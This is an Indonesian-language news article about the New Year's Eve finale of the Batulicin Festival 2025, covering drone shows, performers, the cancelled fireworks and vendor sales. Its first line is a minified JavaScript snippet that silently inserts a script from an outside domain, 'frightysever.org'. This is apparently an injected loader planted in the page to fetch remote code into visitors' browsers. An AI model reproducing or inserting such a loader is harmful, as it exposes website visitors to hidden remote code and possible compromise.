(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, BATULICIN – Meski tanpa pertunjukan pesta kembang api, malam pergantian tahun 2025 ke 2026 pada puncak Batulicin Festival (Batfest) 2025 tetap berlangsung meriah, Kamis (1/1/2026) tengah malam.
Sekitar 100 ribu lebih pengunjung dari berbagai wilayah yang tumpah ruah di Pantai Festival Jhonlin, Kelurahan Tungkaran Pangeran, Kecamatan Simpang Empat, Kabupaten Tanah Bumbu, Kalimantan Selatan membaur penuh semangat mengantarkan penghujung tahun 2025.
Jhonlin Group sebagai penyelenggara menyajikan pertunjukan Drone Light Show bertemakan tahun baru. Diantaranya tulisan Happy New Year 2026 melayang di langit Batfest melalui selebrasi ratusan drone. Pertunjukan ini disambut gegap gempita para penonton yang hadir sejak sore hari dan setia hingga tengah malam.
Baca juga: UMK Banjarbaru Rp3,8 Juta, Lebih Besar dari UMP Kalsel
Selain itu ucapan selamat ulang tahun kepada owner Jhonlin Group, H Andi Syamsuddin Arsyad alias H Isam turut menghiasi gemerlapnya langit Pantai Festival. Saat kalimat Happy Birthday H Sam ditampilkan, tepuk tangan riuh pengunjung pun menggema.
Tak lupa, ratusan drone juga menampakkan tulisan ‘Pray for Indonesia’ sebagai bentuk rasa iba dan simpati kepada para korban yang sedang mendapat ujian beragam bencana alam di beberapa wilayah di Tanah Air.
Tak sedikit dari mereka melontarkan teriakan terimakasih kepada pemilik Jhonlin Group H Andi Syamsuddin Arsyad disela keramaian. “Terima kasih pak H Isam. Selamat ulang tahun pak haji,” teriak pengunjung.
Ungkapan itu sangat beralasan mengingat dalam 5 tahun terakhir ini, warga Kabupaten Tanah Bumbu khususnya dan masyarakat Kalimantan Selatan pada umumnya secara konsisten disuguhkan hiburan event berkelas nasional.
Menyajikan beragam hiburan panggung raksasa yang di isi sederet musisi papan atas. Kemudian pusat jajanan melalui bazar UMKM dan PKL, serta jalan santai berhadiah ratusan umrah gratis yang dikemas dalam kegiatan Batfest.
Baca juga: Sudah Sah! Daftar Lengkap UMP dan UMK Kalimantan 2026 di Semua Provinsi, Ada yang Tembus Rp3,7 Juta
Pergantian Tahun Dihibur Kotak, Setia Band dan NDX AKA
Pada puncak malam pergantian tahun, Batfest 2025 dihibur aksi panggung Kotak Band, Setia Band dan NDX AKA. Seratus ribu lebih pengunjung sangat antusias memadati lapangan Batfest. Bahkan tak sedikit yang ikut bernyanyi dan bergoyang mengiring aksi artis idola mereka.
Suasana penuh kebahagiaan dan kebersamaan menghiasi event ini. Mereka membaur dari berbagai kalangan, baik remaja, dewasa, anak-anak hingga lansia. Fenomena ini menunjukkan tak ada perbedaan diantara pengunjung, tujuan mereka satu merayakan tahun baru dengan suka cita.
“Adanya Batfest ini memberikan hiburan kepada masyarakat untuk merayakan tahun baru. Selain itu ekonomi warga juga berkembang pada kegiatan ini,” kata Saifullah seraya menyampaikan terima kasih kepada owner Jhonlin H Isam.
Dia berharap event yang diklaim terbesar di Indonesia bagian Tengah dan Timur ini terus dilaksanakan setiap tahun agar masyarakat tetap mendapatkan hiburan akhir tahun.
Sementara ratusan pelaku UMKM dan pedagang kaki lima yang difasilitasi membuka usahanya di arena Batfest ini mengaku sangat terbantu dan mendapatkan peningkatan penjualan serta omzet.
Salah satunya Imam, pedagang es campur dan es dawet asal Batulicin mengaku dalam 5 hari berjualan di bazar PKL dagangan laku keras. “Alhamdulillah hasilnya melebihi (omzet normal). Ramai pengunjung tumpah ruah ke sini,” ucap Imam.
Biasanya kalau usaha di setiap hari rata-rata omzetnya hanya sekitar Rp300 ribu. Tapi selama jualan di Batfest meningkat signifikan hingga 3 kali lipat lebih. “Hasilnya bisa Rp800 sampai Rp1 juta. Kalau hari-hari biasa cuma Rp300 ribu,” imbuhnya.
Imam berharap, mewakili pelaku usaha dan PKL lainnya Batfest kembali digelar dan memberikan kesempatan kepada mereka. “Semoga kedepan Batfest semakin jaya,” doanya.
Terpantau di Batfest, nyaris semua stand pedagang baik PKL maupun UMKM dijejaki para pembeli. Transaksi jual beli di lokasi ini tak pernah berhenti selama aksi panggung hiburan berlangsung. Beragam dagangan yang dijual pun tak sepi dari konsumen.
Pada Batfest 2025 ini, Jhonlin Group menyediakan 350 stand pelaku UMKM dan 380 lapak PKL yang difasilitasi secara gratis. Batfest yang dimulai sejak 27 Desember 2025 lalu dan berakhir 1 Januari 2026 dini hari.
Baca juga: Tahun 2026 Bupati Sahrujani Berharap HSU Semakin “Bangkit”
Jhonlin Group Patuhi Larangan Pesta Kembang Api
Pada puncak pagelaran Batfest 2025 dan pergantian tahun 2026 kali ini memang Jhonlin Group tak menyajikan pertunjukan pesta kembang api seperti tahun-tahun sebelumnya.
Padahal salah satu ikon Batfest adalah pesta kembang api spektakuler. Namun, kali ini ditiadakan untuk mematuhi larangan sesuai instruksi pemerintah.
Yakni sebagai bentuk empati dan solidaritas terhadap korban bencana alam di Sumatera dan beberapa daerah lainnya di Nusantara. Langkah ini juga bagian komitmen Jhonlin Group untuk menjaga ketertiban dan keamanan lingkungan.
Baca juga: PWI Kalteng Gelar Konferda, PLN UPT Palangkaraya Terima Penghargaan Peduli Pers
Deretan Musisi Papan Atas Isi Batfest 2025
Adapun selama 5 hari Batfest digelar, sederet musisi papan atas mengisi panggung hiburannya. Seperti Raisa, Rizky Febian, Lyodra, Kotak Band, Wali, Setia Band, J-Rocks, Marion Jola dan Rony Parulian.
Kemudian King Nassar, NDX AKA dan Ndarboy Genk. Serta spesial penampilan maestro Andi Rianto bersama Magenta Orchestra. Turut disuguhkan artis viral, penyanyi lagu Tor Monitor Ketua, Juan Riza. Sementara untuk MC dihadirkan host Anwar dan Boyen. (Kanalkalimantan.com/kk)
Reporter: kk
Editor: bie
KANALKALIMANTAN.COM, BANJARMASIN – Mengawali pergantian tahun, Kota Banjarmasin diguyur hujan dari pagi hingga petang, Kamis… Read More
KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru mengumumkan Upah Minimum Kota (UMK) berdasarkan Keputusan Gubernur… Read More
KANALKALIMANTAN.COM, AMUNTAI – Bupati Hulu Sungai Utara (HSU) H Sahrujani mengharapkan agar Kabupaten HSU pada… Read More
KANALKALIMANTAN.COM, PALANGKARAYA - Persatuan Wartawan Indonesia (PWI) Provinsi Kalimantan Tengah menggelar Konferensi Kerja Daerah (Konferda)… Read More
KANALKALIMANTAN. COM, PONTIANAK - PT PLN (Persero) Unit Pelaksana Pengatur Beban (UP2B) Kalimantan Barat memastikan… Read More
KANALKALIMANTAN.COM, BANJARMASIN — Menutup tahun 2025, Polres Kota Banjarmasin mengungkap kasus peredaran narkotika berupa 1… Read More
This website uses cookies.